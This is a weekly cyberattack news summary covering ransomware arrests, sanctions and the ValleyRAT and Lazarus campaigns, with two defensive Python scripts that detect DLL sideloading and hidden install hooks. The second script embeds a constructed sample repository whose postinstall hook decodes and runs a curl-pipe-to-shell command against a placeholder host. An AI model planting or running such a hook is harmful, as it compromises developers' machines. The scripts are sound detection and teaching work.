Cyber background
12 February 2025

Weekly Summary Cyberattacks February 6-12

Four hackers linked to Phobos ransomware arrested, 8Base ransomware operation dismantled   

An international police operation has led to the arrest of four suspected hackers in Phuket, Thailand, and the takedown of the 8Base ransomware group's websites. The detainees, two men and two women of European origin, allegedly extorted more than 1,000 victims worldwide, obtaining $16 million in Bitcoin. The operation, dubbed “Phobos Aetor”, included raids at four locations, where electronic devices and cryptocurrencies were seized. Swiss authorities requested the extradition of the suspects, who are accused of attacks against 17 Swiss companies between 2023 and 2024. The hackers stole data and encrypted files to demand ransoms in cryptocurrency, which makes the money difficult to trace. The 8Base group's negotiation and data-leak sites were seized by European authorities.

 

U.S., UK and Australia sanction Russian company linked to cyberattacks   

The United States, United Kingdom and Australia have imposed joint sanctions against Zservers, a Russian bulletproof hosting (BPH) provider accused of facilitating ransomware attacks. According to the U.S. Treasury Department, Zservers has provided infrastructure to affiliates of LockBit, one of the most active ransomware groups and the one responsible for the 2023 attack against the U.S. arm of the Industrial and Commercial Bank of China. The sanctions block the property and assets of the company and of two Russian managers, Alexander Mishin and Aleksandr Bolshakov, for their role in providing services to cybercriminals, and prohibit U.S. citizens and companies from transacting with them. This action is part of a joint strategy to dismantle the support networks cybercrime depends on and to protect critical infrastructure internationally.


Fake Google Chrome sites spread ValleyRAT malware   

Cybersecurity researchers have detected a new malware campaign in which fake websites mimicking the Google Chrome download page distribute the ValleyRAT remote access Trojan. The attack, attributed to the Silver Fox group, particularly targets Chinese-speaking users in regions such as Hong Kong, Taiwan and mainland China, with a focus on finance, accounting and sales professionals. The malware is distributed via a ZIP archive containing a rogue Chrome installer. When executed, it downloads several malicious files, including a DLL that runs ValleyRAT. The technique relies on users' trust in what looks like a legitimate download, and on DLL search-order hijacking (sideloading): a legitimately signed executable loads the attacker's DLL from its own directory because Windows consults the application directory before the system directories when a DLL is requested by name. ValleyRAT allows attackers to log keystrokes, monitor the screen, establish persistence on the system and execute remote commands. The campaign reinforces a growing trend of rogue installers being used to spread malware to unsuspecting users looking to download legitimate software.
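The sideloading mechanism described above can be modelled directly: the loader searches the executable's own directory before System32, so an unsigned DLL placed beside a signed installer and given a system DLL's name is the one that gets loaded. The script below is an added example for this page, not code from the ValleyRAT campaign or from any vendor; the file system, file names and signer names are constructed, and the "signed" flag stands in for a real Authenticode check.

```python
"""Model of the Windows DLL search order used in DLL sideloading, with a
simple triage rule for finding sideload candidates on disk.

Added example for this page, not code from the ValleyRAT campaign or from
any vendor. The file system, file names and signer names are constructed."""
from pathlib import PureWindowsPath

# Directories the loader consults after the application directory when a DLL
# is requested by bare name (SafeDllSearchMode on). Only the parts needed to
# show the shadowing are modelled; the current directory and PATH are omitted.
SYSTEM_DIRS = (r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows")

# DLL names often chosen for sideloading because many signed binaries import
# them by bare name. Illustrative list, not exhaustive.
COMMONLY_SIDELOADED = {"version.dll", "dbghelp.dll", "wtsapi32.dll",
                       "msimg32.dll", "dwmapi.dll"}

# Constructed sample file system: path -> signature metadata. The "signed"
# flag stands in for an Authenticode check (e.g. Get-AuthenticodeSignature).
SAMPLE_FS = {
    r"C:\Windows\System32\version.dll":
        {"signed": True, "signer": "Microsoft Windows"},
    # Legitimately signed installer dropped by the fake download site
    r"C:\Users\victim\Downloads\ChromeSetup\Setup.exe":
        {"signed": True, "signer": "Example Vendor"},
    # Unsigned DLL beside it with the same name as the system DLL, so it wins
    r"C:\Users\victim\Downloads\ChromeSetup\version.dll":
        {"signed": False, "signer": None},
    # Benign control: signed app with its own signed helper that shadows nothing
    r"C:\Program Files\Good\good.exe": {"signed": True, "signer": "Good Co"},
    r"C:\Program Files\Good\goodhelper.dll": {"signed": True, "signer": "Good Co"},
}


def _in_system_dir(path):
    low = path.lower()
    return any(low.startswith(d.lower() + "\\") for d in SYSTEM_DIRS)


def resolve_dll(dll_name, app_dir, fs=SAMPLE_FS):
    """Return the path the loader would pick for `dll_name` requested by bare
    name from an executable in `app_dir`, or None if nothing matches."""
    index = {p.lower(): p for p in fs}
    for directory in (app_dir, *SYSTEM_DIRS):
        candidate = str(PureWindowsPath(directory) / dll_name).lower()
        if candidate in index:
            return index[candidate]
    return None


def find_sideload_candidates(fs=SAMPLE_FS):
    """Flag DLLs that sit next to a signed executable, carry the name of a
    system DLL (or a commonly sideloaded one) and are not signed by the same
    publisher as the executable."""
    system_dll_names = {PureWindowsPath(p).name.lower()
                        for p in fs if _in_system_dir(p) and p.lower().endswith(".dll")}
    findings = []
    for exe, exe_meta in fs.items():
        if not exe.lower().endswith(".exe") or not exe_meta["signed"]:
            continue
        app_dir = str(PureWindowsPath(exe).parent)
        for dll, dll_meta in fs.items():
            if not dll.lower().endswith(".dll"):
                continue
            if str(PureWindowsPath(dll).parent).lower() != app_dir.lower():
                continue
            name = PureWindowsPath(dll).name.lower()
            shadows = name in system_dll_names
            suspicious_name = shadows or name in COMMONLY_SIDELOADED
            signer_mismatch = (not dll_meta["signed"]
                               or dll_meta["signer"] != exe_meta["signer"])
            if suspicious_name and signer_mismatch:
                findings.append({
                    "exe": exe,
                    "dll": dll,
                    "shadows_system_dll": shadows,
                    # Which copy the loader actually picks for that name
                    "resolved": resolve_dll(name, app_dir, fs),
                })
    return findings


if __name__ == "__main__":
    for f in find_sideload_candidates():
        print(f"{f['exe']} would load {f['resolved']} "
              f"(shadows system DLL: {f['shadows_system_dll']})")
```

On a real host the same rule is worth running over Downloads and Temp directories with signatures taken from the binaries themselves; the signer mismatch is what separates a sideload from a vendor shipping its own helper DLLs.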


Lazarus Group uses fake job postings to steal cryptocurrency   

North Korean hacking group Lazarus has been linked to an active campaign that uses fake job offers on LinkedIn to distribute malware targeting Windows, macOS and Linux users. According to cybersecurity firm Bitdefender, the attackers lure victims with supposed remote jobs in the cryptocurrency and tourism sectors, requesting personal data such as resumes or links to GitHub repositories. After obtaining this information, the attackers send links to fake projects on GitHub or Bitbucket that contain malicious code designed to steal data from cryptocurrency wallets installed in browsers. The malware also functions as a loader for other threats, including a Python-based Trojan that monitors the clipboard and provides persistent remote access. The methods employed bear similarities to the “Contagious Interview” campaign, already documented by security researchers, which uses JavaScript and Python Trojans to steal credentials and deploy further stages. In some cases, victims are asked to clone and run a Web3 repository as part of the supposed hiring process. This campaign, widely reported on social networks such as LinkedIn and Reddit, is part of a larger strategy by Lazarus to infiltrate systems and steal cryptocurrency through sophisticated social engineering and cross-platform malware.
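The "clone this repository and run it" step is where the compromise happens, so a quick static pass before `npm install` is worth having. The script below is an added example for this page; its heuristics are illustrative and are not Bitdefender's or any vendor's published detection logic. The repository it scans is constructed in memory: a package.json with a postinstall hook, and a setup script that base64-decodes and evals a hidden command pointing at the reserved `.invalid` TLD.

```python
"""Static triage for a repository a "recruiter" asks you to clone and run.

Added example for this page; the heuristics are illustrative and are not
Bitdefender's or anyone's published detection logic. The repository
contents below are constructed."""
import base64
import json
import re

# npm lifecycle scripts that run automatically on `npm install`
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

PATTERNS = {
    "dynamic code execution": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "process spawning": re.compile(r"child_process|\bsubprocess\b|os\.system\("),
    "base64 decoding": re.compile(
        r"""Buffer\.from\([^)]*['"]base64['"]\)|\batob\s*\(|b64decode\("""),
}
# Quoted string of 40+ base64 characters; captured so it can be decoded
BLOB = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")


def _constructed_repo():
    """Constructed sample: a 'Web3 demo' whose postinstall hook decodes and
    evals a hidden command. The domain uses the reserved .invalid TLD."""
    hidden = base64.b64encode(b"curl -s http://example.invalid/stage2 | sh").decode()
    return {
        "package.json": json.dumps({
            "name": "web3-demo",
            "scripts": {"postinstall": "node scripts/setup.js",
                        "start": "node index.js"},
        }),
        "index.js": "const Web3 = require('web3');\nconsole.log('demo');\n",
        "scripts/setup.js": (
            "const cp = require('child_process');\n"
            f"const p = Buffer.from('{hidden}', 'base64').toString();\n"
            "eval(p);\n"
        ),
    }


SAMPLE_REPO = _constructed_repo()


def install_hooks(package_json_text):
    """Names of lifecycle scripts that would run unattended on install."""
    try:
        data = json.loads(package_json_text)
    except ValueError:
        return []
    return sorted(h for h in data.get("scripts", {}) if h in LIFECYCLE_HOOKS)


def decode_blobs(text):
    """Decode long base64 literals that turn out to be printable ASCII."""
    out = []
    for m in BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            continue
        if raw and all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out


def scan_repo(files):
    """Return (path, indicator) pairs for every file in the tree."""
    findings = []
    for path, text in sorted(files.items()):
        if path.split("/")[-1] == "package.json":
            for hook in install_hooks(text):
                findings.append((path, f"lifecycle hook: {hook}"))
        for label, pat in PATTERNS.items():
            if pat.search(text):
                findings.append((path, label))
        for decoded in decode_blobs(text):
            findings.append((path, f"decoded blob: {decoded}"))
    return findings


def verdict(findings):
    """Refuse outright when install hooks combine with hidden code paths."""
    labels = {label for _, label in findings}
    has_hook = any(l.startswith("lifecycle hook") for l in labels)
    has_hidden = any(l.startswith(("dynamic code", "decoded blob")) for l in labels)
    if has_hook and has_hidden:
        return "do not run: install hook with hidden executable payload"
    if findings:
        return "review before running"
    return "no indicators"


if __name__ == "__main__":
    found = scan_repo(SAMPLE_REPO)
    for path, label in found:
        print(f"{path}: {label}")
    print(verdict(found))
```

Passing the scan does not make a repository safe; the useful outcome is the failing case, where an install hook and an obfuscated payload together are reason enough to stop and run the "assignment" only in a disposable VM, if at all.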